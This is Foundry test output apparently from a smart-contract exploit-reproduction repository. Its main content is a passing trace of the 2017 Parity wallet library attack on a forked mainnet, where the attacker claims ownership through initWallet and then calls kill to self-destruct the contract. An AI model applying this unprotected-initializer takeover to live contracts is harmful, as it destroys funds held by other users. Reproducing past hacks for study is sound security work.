Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 903.97ms
Solc 0.8.10 finished in 1.06s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 499.92ms (3.49ms CPU time)

Ran 1 test for src/test/2017-11/Parity_kill_exp.sol:ContractTest
[PASS] testExploit() (gas: 216749)
Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 4501735 [4.501e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [236649] ContractTest::testExploit()
    ├─ [2598] 0x863DF6BFa4469f3ead0bE8f9F2AAE51c91A907b4::isOwner(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] false
    ├─ [114881] 0x863DF6BFa4469f3ead0bE8f9F2AAE51c91A907b4::initWallet([0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 0)
    │   ├─  storage changes:
    │   │   @ 4: 0 → 17476
    │   │   @ 1: 0 → 2
    │   │   @ 6: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 7: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0x1135e4e44038ee15611247362d11682dc09f56122cfa8ae92844e35c9b54f535: 0 → 2
    │   └─ ← [Stop]
    ├─ [598] 0x863DF6BFa4469f3ead0bE8f9F2AAE51c91A907b4::isOwner(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] true
    ├─ [0] VM::assertTrue(true) [staticcall]
    │   └─ ← [Return]
    ├─ [60402] 0x863DF6BFa4469f3ead0bE8f9F2AAE51c91A907b4::kill(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ emit Confirmation(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x0e6751dbbd1614048d0b02eaa96ae3278841581dd451e01e83978ae7174c6a7c)
    │   ├─  storage changes:
    │   │   @ 263: 0 → 1
    │   └─ ← [SelfDestruct]
    ├─ [598] 0x863DF6BFa4469f3ead0bE8f9F2AAE51c91A907b4::isOwner(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] true
    ├─  storage changes:
    │   @ 32: 0 → 1
    │   @ 0xc97bfaf2f8ee708c303a06d134f5ecd8389ae0432af62dc132a24118292866bb: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.49s (3.04s CPU time)

Ran 2 test suites in 5.32s (4.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
